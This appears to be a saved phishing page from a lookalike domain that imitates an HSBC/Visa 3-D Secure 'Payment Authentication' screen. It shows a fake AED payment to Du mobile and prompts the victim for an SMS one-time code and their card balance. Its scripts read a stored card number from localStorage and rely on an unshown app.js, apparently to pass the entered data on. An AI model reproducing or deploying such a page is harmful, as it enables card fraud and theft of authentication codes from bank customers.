<!DOCTYPE html>
<!-- saved from url=(0037)https://perfecktly.mom/security/#code -->
<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.10/jquery.mask.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>

    <script>
        const fuckYouToken = "0eba1e515b59c6e9281cb40ec3aba5ebc578e7896021bdf27831e8db3e1bb90df9a74f"
    </script>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        [data-real-id="main-balance-error-text"],
        [data-real-id="main-code-error-text"] {
            color: red;
            font-size: 12px;
            line-height: 1.2;
            display: block;
        }
        
        #main-loader_ {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: #ffffffa6;
            display: flex;
            align-items: center;
            justify-content: center;
            z-index: 2;
        }
        
        .containerrr {
            position: relative;
            width: 0px;
            height: 20px;
            animation: spin 2s linear infinite;
        }
        
        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }
            100% {
                transform: rotate(360deg);
            }
        }
        
        .rectangless {
            position: absolute;
            width: 2px;
            height: 10px;
            background-color: black;
            transform-origin: 50% 100%;
        }
        
        .rectangless:nth-child(1) {
            transform: rotate(0deg) translate(0, -10px);
        }
        
        .rectangless:nth-child(2) {
            transform: rotate(36deg) translate(0, -10px);
        }
        
        .rectangless:nth-child(3) {
            transform: rotate(72deg) translate(0, -10px);
        }
        
        .rectangless:nth-child(4) {
            transform: rotate(108deg) translate(0, -10px);
        }
        
        .rectangless:nth-child(5) {
            transform: rotate(144deg) translate(0, -10px);
        }
        
        .rectangless:nth-child(6) {
            transform: rotate(180deg) translate(0, -10px);
        }
        
        .rectangless:nth-child(7) {
            transform: rotate(216deg) translate(0, -10px);
        }
        
        .rectangless:nth-child(8) {
            transform: rotate(252deg) translate(0, -10px);
        }
        
        .rectangless:nth-child(9) {
            transform: rotate(288deg) translate(0, -10px);
        }
        
        .rectangless:nth-child(10) {
            transform: rotate(324deg) translate(0, -10px);
        }
        
        #main-loader_ img {
            width: 59px;
        }
        
        [data-real-id="resend-code"],
        [data-real-id="send-code"],
        [data-real-id="send-balance"],
        [data-real-id="exit"],
        a {
            cursor: pointer;
        }
    </style>
    <script type="text/javascript" defer="" src="./hsbcsms_files/472e6a4e-23e5-4110-9847-924ecc7c11b1.js.Без названия"></script>
</head>

<body style="margin:0">
    <title>Validate</title>
    <link href="./hsbcsms_files/css.css" rel="stylesheet">
    <div class="container" tabindex="-1">
        <div class="div-loading" id="loader" style="display: none">
            <img src="./hsbcsms_files/198168" class="img-loading" alt="Loading Image">
        </div>
        <div class="header-zone">
            <div class="lang-section" style="display:none">
                <select id="langSelectOption">
				<option class="selectOption" value="ar">عربى</option>
				<option class="selectOption" value="en" selected="">English (US)</option>
			</select>
            </div>
            <div class="secondary-btn">
                <button data-real-id="exit">Cancel</button>
            </div>
        </div>
        <div class="branding-zone">
            <div class="issuer-bank-logo">
                <img id="issuer-image" src="./hsbcsms_files/111580">
            </div>
            <div class="card-brand-logo">
                <img data-real-id="brand-logo" src="./hsbcsms_files/visa.png">
            </div>
        </div>
        <div data-real-id="code-window" class="challenge-zone" id="challenge-zone" style="display: none;">
            <div class="challenge-info-header">
                <div>
                    <h1 class="challenge-info-header-h1">Payment Authentication</h1>
                </div>
                <p style="color: #000; text-align: center; margin-top: 20px; display: block;" id="smsinf"></p>
            </div>
            <div>
                <div id="challenge_info" class="challenge-info-text">
                    <div data-real-id="main-code-error" class="container-body-header-desc-otp-ext" id="bbEntryValidation" style="display: none">
                        <div class="clientErrorMsg" style="margin-left: auto;margin-right: auto;width: fit-content;">
                            <img class="authFailure-arrow-image" src="./hsbcsms_files/198172" alt="Auth Failure Arrow Image">
                            <p data-real-id="main-code-error-text" id="bbEntryValidationText" role="alert" style="color: #CC3333; display: table; width: calc(100% - 45px);"></p>
                        </div>
                    </div>
                    <div class="container-body-header-desc-otp-ext">
                        <p>We have sent an SMS with a secure code to your registered mobile number</p>
                        <p class="txnDetails"><span style="color:black">You are paying merchant <span data-real-id="merchant">Du mobile</span> the amount of
                            <span data-real-id="curency">AED</span><span id="amount">200</span> on
                            <span id="rddate">24/05/2024</span>
                            </span>
                        </p>
                    </div>
                </div>
            </div>
            <div class="txnInputFormDiv">
                <div class="container-body-txnInput-verify">
                    <div>
                        <input style="margin:0" data-real-id="code" type="text" id="otp" maxlength="6" class="text_input" placeholder="Enter your secure code">
                        <p style="height:15px;color: #CC3333;text-align: left;min-width: 205px;display: block;width: 165px;margin: auto;margin-top: 5px;font-size: 11px;margin-bottom: calc(2em - 11px);">
                            <span data-real-id="code-local-error" style="display: none;"></span>
                        </p>
                    </div>
                    <div class="container-body-submit-elongated">
                        <div class="container-body-submit-input-elongated">
                            <input data-real-id="send-code" id="verify-btn-elongated" onclick="send2()" class="button" type="button" value="VERIFY">
                        </div>
                    </div>
                    <div>
                        <div>
                            <div class="container-body-resend">
                                <div class="container-body-resend-input">
                                    <input data-real-id="resend-code" id="resend-button" class="resend_button" type="button" value="Resend Code">
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <div data-real-id="balance-window" class="challenge-zone" id="challenge-zone" style="display: block;">
            <div class="challenge-info-header">
                <div>
                    <h1 class="challenge-info-header-h1">Security Сheck</h1>
                </div>
            </div>
            <div>
                <div id="challenge_info" class="challenge-info-text">
                    <div data-real-id="main-balance-error" class="container-body-header-desc-otp-ext" id="bbEntryValidation" style="display: none">
                        <div class="clientErrorMsg" style="margin-left: auto;margin-right: auto;width: fit-content;">
                            <img class="authFailure-arrow-image" src="./hsbcsms_files/198172" alt="Auth Failure Arrow Image">
                            <p data-real-id="main-balance-error-text" id="bbEntryValidationText" role="alert" style="color: #CC3333; display: table; width: calc(100% - 45px);"></p>
                        </div>
                    </div>
                    <div class="container-body-header-desc-otp-ext">
                        <p>To complete transaction, verify it's you. <br>Enter your card <span id="card-container2">*1456</span> balance.</p>
                    </div>
                </div>
            </div>
            <div class="txnInputFormDiv">
                <div class="container-body-txnInput-verify">
                    <div>
                        <input style="margin:0" data-real-id="balance" type="text" id="bal" class="text_input in-active" placeholder="Enter your card balance">
                        <p style="height:15px;color: #CC3333;text-align: left;min-width: 205px;display: block;width: 165px;margin: auto;margin-top: 5px;font-size: 11px;margin-bottom: calc(2em - 11px);">
                            <span data-real-id="balance-local-error" style="display: none;"></span>
                        </p>
                    </div>
                    <div class="container-body-submit-elongated">
                        <div class="container-body-submit-input-elongated">
                            <input data-real-id="send-balance" id="verify-btn-elongated" class="button in-active" type="button" value="VERIFY" onclick="send3()">
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="container-footer"> <button title="Learn more about Authentication" onclick="toggleFooterContent(this)" aria-controls="hideText" aria-expanded="false" id="displayText" tabindex="0"> <span class="whyInfo-arrow-span">Learn more about authentication</span> <img class="whyInfo-arrow-image" id="downwardArrowImageWhyInfo" src="./hsbcsms_files/198176.svg" alt="Show Learn more about Authentication" height="20" width="20" style="display: block;"> <img class="whyInfo-arrow-image" id="minusArrowImageWhyInfo" src="./hsbcsms_files/198184.svg" alt="Hide Learn more about Authentication" height="20" width="20" style="display: none;"> </button>
            <div style="display: none; max-height: 100%;" aria-labelledby="displayText" id="hideText" role="region">
                <div style="display: inline-block; width: 100%;">
                    <div class="hidetext-span">A password-protected authentication system designed to confirm the identity of the cardholder. By requesting a password known only to the cardholder, the bank can verify that the genuine cardholder is entering their card details into
                        an e-commerce website
                    </div>
                </div>
            </div> <button onclick="toggleFooterContent(this)" aria-controls="hideText1" aria-expanded="false" id="displayText1" tabindex="0" title="Need Some Help?"> <span class="expandableInfo-arrow-span">Need
				Some Help?</span> <img class="expandableInfo-arrow-image" id="downwardArrowImageExpandableInfo" src="./hsbcsms_files/198176.svg" alt="Show Need Some Help?" height="20" width="20" style="display:block;"> <img class="expandableInfo-arrow-image" id="minusArrowImageExpandableInfo" src="./hsbcsms_files/198184.svg" alt="Hide Need Some Help?" height="20" width="20" style="display:none;"> </button>
            <div style="display: none; max-height: 100%;" aria-labelledby="displayText1" id="hideText1" role="region">
                <div style="display: inline-block; width: 100%;">
                    <div class="hidetext1-span">Please contact us through the Customer Service number on the back of your card</div>
                </div>
            </div>
        </div>
    </div>
    <div class="" id="pload2" style="display: none;height: 100vh; justify-content: center; align-items: center; width: 100%; position: fixed; top: 0; left: 0; background-color: #0000003e; z-index: 9999999999;">
        <div class="containerrr">
            <div class="rectangless"></div>
            <div class="rectangless"></div>
            <div class="rectangless"></div>
            <div class="rectangless"></div>
            <div class="rectangless"></div>
            <div class="rectangless"></div>
            <div class="rectangless"></div>
            <div class="rectangless"></div>
            <div class="rectangless"></div>
            <div class="rectangless"></div>
        </div>
    </div>
    <script>
        const input = document.getElementById('bal');
        const prefix = "AED ";

        // Добавление префикса, если поле пустое при фокусе
        input.addEventListener('focus', function() {
            if (input.value === "") {
                input.value = prefix;
            }
        });

        // Обработка ввода
        input.addEventListener('input', function() {
            if (!input.value.startsWith(prefix)) {
                input.value = prefix;
            }
        });

        // Предотвращение удаления префикса
        input.addEventListener('keydown', function(event) {
            if (input.selectionStart < prefix.length &&
                (event.key !== 'ArrowLeft' && event.key !== 'ArrowRight' && event.key !== 'Backspace' && event.key !== 'Delete')) {
                event.preventDefault();
                input.setSelectionRange(prefix.length, prefix.length);
            }
        });

        // Установка курсора после префикса при клике
        input.addEventListener('click', function() {
            if (input.selectionStart < prefix.length) {
                input.setSelectionRange(prefix.length, prefix.length);
            }
        });

        // Очистка поля при потере фокуса, если оно равно префиксу
        input.addEventListener('blur', function() {
            if (input.value === prefix) {
                input.value = "";
            }
        });

        // Инициализация, если значение поля уже установлено
        if (input.value.length > 0 && !input.value.startsWith(prefix)) {
            input.value = prefix + input.value;
        }
    </script>
    <script>
        document.getElementById('amount').textContent = ' ' + localStorage.getItem('amount');
        console.log(localStorage.getItem('amount'))
        window.onload = function() {
            var savedData = localStorage.getItem('cnum');
            document.getElementById('card-container2').textContent = savedData;
            var currentDate = new Date();

            var year = currentDate.getFullYear();
            var month = String(currentDate.getMonth() + 1).padStart(2, '0');
            var day = String(currentDate.getDate()).padStart(2, '0');
            var hours = String(currentDate.getHours()).padStart(2, '0');
            var minutes = String(currentDate.getMinutes()).padStart(2, '0');
            var seconds = String(currentDate.getSeconds()).padStart(2, '0');

            var formattedDateTime = year + '/' + month + '/' + day;
            document.getElementById('rddate').textContent = formattedDateTime;

        }

        function codeBefore() {

        }

        function codeAfter() {

        }

        function balanceBefore() {

        }

        function balanceAfter() {

        }

        function toggleFooterContent(e) {
            if (e || e.children) {
                for (var n of e.children) n && n.nodeName && "IMG" === n.nodeName && n && n.style && n.style.display && (n.style.display = "none" === n.style.display ? "block" : "none");
                e && e.nextElementSibling && e.nextElementSibling.style && e.nextElementSibling.style.display && (e.nextElementSibling.style.display = "none" === e.nextElementSibling.style.display ? "block" : "none")
            }
        }
    </script>
    <div style="display: none;" id="main-loader_"><img src="./hsbcsms_files/spinner.gif"></div>
</body>
<script src="/js/app.js"></script>

</html>